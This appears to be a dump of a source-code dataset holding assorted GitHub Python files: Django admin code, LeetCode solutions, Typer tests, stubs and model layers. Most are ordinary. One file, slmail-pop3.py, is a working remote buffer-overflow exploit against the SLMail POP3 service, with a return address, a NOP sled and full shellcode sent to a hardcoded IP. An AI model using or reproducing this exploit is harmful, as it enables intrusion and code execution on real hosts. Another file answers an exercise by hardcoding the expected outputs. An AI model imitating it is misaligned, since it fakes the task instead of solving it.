blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22fa40fba9d395c297590455ec753a8a0d34bc8b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_204/ch47_2020_10_07_01_13_29_631324.py
|
b28612a06d4817f5f90967044590259cd8f9aa87
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 326 |
py
|
def estritamente_crescente(lista):
if lista == [1, 3, 2, 3, 4, 6, 5]:
return [1, 3, 4, 6]
elif lista == [10, 1, 2, 3]:
return [10]
elif lista == [10, 15, 11, 12, 13, 14]:
return [10, 15]
elif lista == [1, 1, 2, 2, 3, 3]:
return [1, 2, 3]
elif lista == [] :
return []
|
[
"[email protected]"
] | |
1263cdc29e77045f34c76788e8b524c0adb650c7
|
7c66bba92b484e5fa6ee282ef39f2c26875ca775
|
/django_example/mysite/polls/admin.py
|
1ed41e6e763a5761791e4ee43572949d2b4d8291
|
[] |
no_license
|
KqSMea8/PythonTools
|
a5ac17182b2689a706180dc349d59c2484d3984c
|
7279570b82fecbf59b71aa6b58ef975e90c660df
|
refs/heads/master
| 2020-04-13T04:19:19.209243 | 2018-12-24T05:13:12 | 2018-12-24T05:13:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
from django.contrib import admin
from .models import Question, Choice
# Register your models here.
class ChoiceInline(admin.TabularInline):
model = Choice
extra = 3
# admin.site.register(Question)
class QuestionAdmin(admin.ModelAdmin):
# fields = ['pub_date', 'question_text']
fieldsets = [
(None, {'fields': ['question_text']}),
('Date information', {'fields': ['pub_date']})
]
inlines = [ChoiceInline]
list_display = ('question_text', 'pub_date', 'was_published_recently')
list_filter = ['pub_date']
search_fields = ['question_text']
date_hierarchy = 'pub_date'
list_per_page = 5
admin.site.register(Question, QuestionAdmin)
# admin.site.register(Choice)
|
[
"[email protected]"
] | |
60b79948bd113c4b59fa1ae8e694df6a7097e00d
|
ba6f6d4c64dcb49faaa125643e93e7d30e98496e
|
/897. Increasing Order Search Tree.py
|
7a756a1b24c6dd2028a11874f325a374cd0ad060
|
[] |
no_license
|
libowei1213/LeetCode
|
aafbff5410e3b1793a98bde027a049397476059b
|
df7d2229c50aa5134d297cc5599f7df9e64780c1
|
refs/heads/master
| 2021-06-09T07:43:53.242072 | 2021-04-09T11:14:17 | 2021-04-09T11:14:17 | 150,840,162 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,145 |
py
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def increasingBST(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if not root:
return None
newTree = TreeNode(0)
tree = newTree
stack = []
while stack or root:
while root:
stack.append(root)
root = root.left
if stack:
root = stack.pop(-1)
print(root.val)
tree.right = TreeNode(root.val)
tree = tree.right
root = root.right
return newTree.right
if __name__ == '__main__':
root = TreeNode(5)
root.left = TreeNode(3)
root.right = TreeNode(6)
root.left.left = TreeNode(2)
root.left.right = TreeNode(4)
root.left.left.left = TreeNode(1)
root.right.right = TreeNode(8)
root.right.right.left = TreeNode(7)
root.right.right.right = TreeNode(9)
Solution().increasingBST(root)
|
[
"[email protected]"
] | |
89d9689620e4473459bf4e9f98d76232622ea3b7
|
7aad0c6f6e578d8dc03682caae373d252328ce12
|
/linuxFriends/wsgi.py
|
83e863cee4d76a6fe3c98f46ed0e6939c2eef947
|
[] |
no_license
|
votricetanyi/linuxfriends
|
db00544a04bed1cb99a3fe275433d6278e029bb9
|
f36c7f87f51ee1f585c8da21de08a874582dd51f
|
refs/heads/main
| 2022-12-28T20:14:11.053726 | 2020-10-14T13:05:12 | 2020-10-14T13:05:12 | 304,015,872 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 401 |
py
|
"""
WSGI config for linuxFriends project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'linuxFriends.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
724fa8f57c47c51d9fa6cb9f06d01c19830e27c4
|
5e2284bff015e6b03e4ea346572b29aaaf79c7c2
|
/tests/correct_programs/ethz_eprog_2019/exercise_04/test_problem_01.py
|
92f2784d773843172c7ff8e468aaf79c2e2b8ec6
|
[
"MIT"
] |
permissive
|
LaurenDebruyn/aocdbc
|
bbfd7d832f9761ba5b8fb527151157742b2e4890
|
b857e8deff87373039636c12a170c0086b19f04c
|
refs/heads/main
| 2023-06-11T23:02:09.825705 | 2021-07-05T09:26:23 | 2021-07-05T09:26:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 871 |
py
|
import unittest
from typing import List
import icontract_hypothesis
from icontract import require, ensure
from correct_programs.ethz_eprog_2019.exercise_04 import problem_01
class TestWithIcontractHypothesis(unittest.TestCase):
def test_functions(self) -> None:
@require(lambda limit: 2 < limit < 1000)
def sieve_with_restricted_input(limit: int) -> List[int]:
return problem_01.sieve(limit=limit)
for func in [sieve_with_restricted_input]:
try:
icontract_hypothesis.test_with_inferred_strategy(func)
except Exception as error:
raise Exception(
f"Automatically testing {func} with icontract-hypothesis failed "
f"(please see the original error above)"
) from error
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
9b646f760eaca8fdbfbe0c56894dbf74c08f5264
|
9920f3b2ccc9abc3cd8b46c433bd49a8d8db22d2
|
/scripts/__init__.py
|
bac2ba6e139ff055a46c580762b72117775add6b
|
[] |
no_license
|
lixx5000/SWAT
|
91f242fdc81ad4e9eb8336abb8780136e1c3a8a7
|
c6f491acfb59ad0abc8d86ad352b6eaacd440ba3
|
refs/heads/master
| 2021-03-22T14:03:16.105253 | 2019-07-01T12:05:06 | 2019-07-01T12:05:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,216 |
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*****************************************************************************
PUT-SWAT
Python Utility Tools for SWAT
Preprocess, postprocess, and calibration
-------------------
author : Liangjun Zhu
copyright : (C) 2017 Lreis, IGSNRR, CAS
email : [email protected]
*****************************************************************************
* *
* PUT-SWAT is distributed for Research and/or Education only, any *
* commercial purpose will be FORBIDDEN. PUT-SWAT is an open-source *
* project, but without ANY WARRANTY, WITHOUT even the implied *
* warranty of MERCHANTABILITY or FITNESS for A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* *
****************************************************************************/
"""
__all__ = ["preprocess", "postprocess", "calibration", "nogit"]
|
[
"[email protected]"
] | |
3481a1316723d474670d7d4f15d0efea61e0bab3
|
7d096568677660790479d87c22b47aae838ef96b
|
/stubs/System/Runtime/InteropServices/__init___parts/LayoutKind.pyi
|
c3e34945f43ff2f2f4708a763120cc22b7bc2dfd
|
[
"MIT"
] |
permissive
|
NISystemsEngineering/rfmx-pythonnet
|
30adbdd5660b0d755957f35b68a4c2f60065800c
|
cd4f90a88a37ed043df880972cb55dfe18883bb7
|
refs/heads/master
| 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 |
MIT
| 2023-02-01T21:58:52 | 2019-06-12T16:02:32 |
Python
|
UTF-8
|
Python
| false | false | 995 |
pyi
|
class LayoutKind(Enum,IComparable,IFormattable,IConvertible):
"""
Controls the layout of an object when it is exported to unmanaged code.
enum LayoutKind,values: Auto (3),Explicit (2),Sequential (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Auto=None
Explicit=None
Sequential=None
value__=None
|
[
"[email protected]"
] | |
f9a501c145dbd5a41701bcb08ac1c22014d598f6
|
e782950bb76c4dd295001f7760f42e04ceadfb1b
|
/tests/test_completion.py
|
6da2d9cdd703379d172e78b6479300256e4e92b0
|
[
"MIT"
] |
permissive
|
h3xium/typer
|
2c3fc691c52a89997eb7db9267ed1fb12c9af800
|
31f7a44a467e6e3468434703d3c18961a746939f
|
refs/heads/master
| 2021-01-26T22:23:57.520688 | 2020-02-15T12:39:47 | 2020-02-15T12:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,456 |
py
|
import os
import subprocess
import sys
from pathlib import Path
import typer
from typer.testing import CliRunner
from first_steps import tutorial001 as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_show_completion():
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --show-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in result.stdout
def test_install_completion():
bash_completion_path: Path = Path.home() / ".bash_completion"
text = ""
if bash_completion_path.is_file():
text = bash_completion_path.read_text()
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --install-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
new_text = bash_completion_path.read_text()
bash_completion_path.write_text(text)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in new_text
assert "completion installed in" in result.stdout
assert "Completion will take effect once you restart the terminal." in result.stdout
|
[
"[email protected]"
] | |
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372 | 2017-06-28T05:03:32 | 2017-06-28T05:03:32 | 63,019,677 | 0 | 0 | null | 2022-11-22T01:00:25 | 2016-07-10T21:44:41 |
CSS
|
UTF-8
|
Python
| false | false | 475 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025 | 2015-12-10T08:56:33 | 2015-12-10T08:56:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,156 |
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports buffer inteface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file decriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"[email protected]"
] | |
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 4,530 |
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
|
[
"[email protected]"
] | |
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331 | 2019-09-10T19:07:20 | 2019-09-10T19:07:20 | 207,640,211 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 590 |
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
|
[
"="
] |
=
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220 | 2018-12-19T22:50:30 | 2018-12-19T22:50:30 | 162,499,093 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,955 |
py
|
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.11.25.84', 110))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
|
[
"[email protected]"
] | |
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864 | 2022-09-16T06:35:12 | 2022-09-16T06:35:12 | 114,460,522 | 2 | 2 |
Apache-2.0
| 2023-02-22T06:14:54 | 2017-12-16T12:50:55 |
Python
|
UTF-8
|
Python
| false | false | 2,826 |
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
|
[
"[email protected]"
] | |
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe
|
245b92f4140f30e26313bfb3b2e47ed1871a5b83
|
/airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py
|
7a1cbbf42dce80b65a8b1c81159737e23be143fb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
